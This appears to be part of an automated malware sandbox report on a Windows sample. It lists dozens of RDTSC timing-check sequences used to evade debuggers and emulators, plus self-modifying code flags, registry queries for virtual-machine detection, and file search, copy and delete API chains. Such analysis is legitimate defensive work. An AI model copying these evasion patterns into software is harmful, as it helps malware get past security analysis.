                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028493 second address: 10284BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F230C515276h 0x0000000a jp 00007F230C515276h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jmp 00007F230C515282h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10284BC second address: 10284D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 js 00007F230C5197A8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 jng 00007F230C5197A6h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103002B second address: 1030030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030030 second address: 103004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F230C5197A6h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C5197ADh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103004E second address: 1030052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E18D second address: 102E193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E193 second address: 102E19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E19E second address: 102E1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1A2 second address: 102E1A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1A8 second address: 102E1AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E1AD second address: 102E1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007F230C51527Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E8C8 second address: 102E8F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F230C5197ADh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA39 second address: 102EA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C51527Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c je 00007F230C515288h 0x00000012 pop edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA6A second address: 102EA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EA74 second address: 102EA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102ED1E second address: 102ED40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F230C5197B4h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102EEA2 second address: 102EEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102FE32 second address: 102FE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10389DF second address: 1038A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F230C515289h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C51527Ah 0x00000011 popad 0x00000012 jp 00007F230C51528Dh 0x00000018 jmp 00007F230C515281h 0x0000001d js 00007F230C515276h 0x00000023 pop edx 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 ja 00007F230C515278h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038A33 second address: 1038A4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038A4A second address: 1038A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044B83 second address: 1044B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047A84 second address: 1047A93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F230C515276h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047A93 second address: 1047A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047C05 second address: 1047C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007F230C515284h 0x0000000e jl 00007F230C515276h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055DA8 second address: 1055DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055DAC second address: 1055DC1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F230C51527Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1055DC1 second address: 1055DC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E9E8 second address: 105E9EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E9EC second address: 105E9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E9F4 second address: 105EA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F230C515283h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D2B9 second address: 105D2BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D2BF second address: 105D2CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D2CB second address: 105D2CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D557 second address: 105D581 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F230C515284h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F230C515280h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D6FA second address: 105D713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D713 second address: 105D730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F230C515284h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105D730 second address: 105D734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DC98 second address: 105DC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105DC9C second address: 105DCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10640E3 second address: 106411C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F230C515288h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C51527Eh 0x00000017 jc 00007F230C515276h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106411C second address: 1064120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769BB second address: 10769BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769BF second address: 10769DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F230C5197ABh 0x00000011 jl 00007F230C5197A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769DC second address: 10769EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769EA second address: 10769EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769EE second address: 1076A17 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C515276h 0x00000008 jp 00007F230C515276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F230C515282h 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076879 second address: 1076889 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C5197ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076889 second address: 107688F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107688F second address: 107689D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F230C5197AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10831DC second address: 10831E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10831E0 second address: 108320B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jg 00007F230C5197A6h 0x00000012 pop ecx 0x00000013 je 00007F230C5197ACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082D97 second address: 1082DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515283h 0x00000009 jmp 00007F230C515282h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082F11 second address: 1082F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1082F16 second address: 1082F2E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C51528Ah 0x00000008 jmp 00007F230C51527Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108621F second address: 1086224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094008 second address: 1094010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094010 second address: 109404D instructions: 0x00000000 rdtsc 0x00000002 js 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F230C5197E2h 0x00000012 push ecx 0x00000013 jmp 00007F230C5197B6h 0x00000018 jmp 00007F230C5197ABh 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007F230C5197A6h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094314 second address: 109431F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109431F second address: 1094324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094324 second address: 109432C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109432C second address: 1094332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10948CF second address: 10948D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10948D3 second address: 1094923 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F230C5197B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F230C5197B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C5197B6h 0x00000017 js 00007F230C5197A6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10965A5 second address: 10965D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F230C515283h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A80A second address: 109A82C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F230C5197B7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A82C second address: 109A832 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A832 second address: 109A85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A85B second address: 109A860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A860 second address: 109A89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F230C5197B5h 0x00000014 popad 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007F230C5197AAh 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AB67 second address: 109AB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AB6B second address: 109AB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F230C5197B0h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109AB83 second address: 109AB87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F025A second address: 51F0260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0260 second address: 51F0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515285h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F230C515283h 0x00000012 mov edi, eax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0293 second address: 51F02B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02B4 second address: 51F02C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02C7 second address: 51F02DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, FA5Ah 0x00000007 mov eax, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02DA second address: 51F02DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02DE second address: 51F02E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F035D second address: 51F03CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F230C515282h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e mov si, 3983h 0x00000012 mov di, si 0x00000015 popad 0x00000016 mov dword ptr [esp], ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F230C515280h 0x00000020 and si, 6548h 0x00000025 jmp 00007F230C51527Bh 0x0000002a popfd 0x0000002b mov edx, eax 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F230C515282h 0x00000035 pop ebp 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F230C51527Ch 0x0000003e pop esi 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC660E second address: FC6612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E21B6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E21C2F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FBA0EA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FB8882 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BD38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BD4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BCDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BCE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BCED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BD4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BCF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BD3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BC16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BCDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BCBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC1160 GetSystemInfo,ExitProcess,0_2_00BC1160
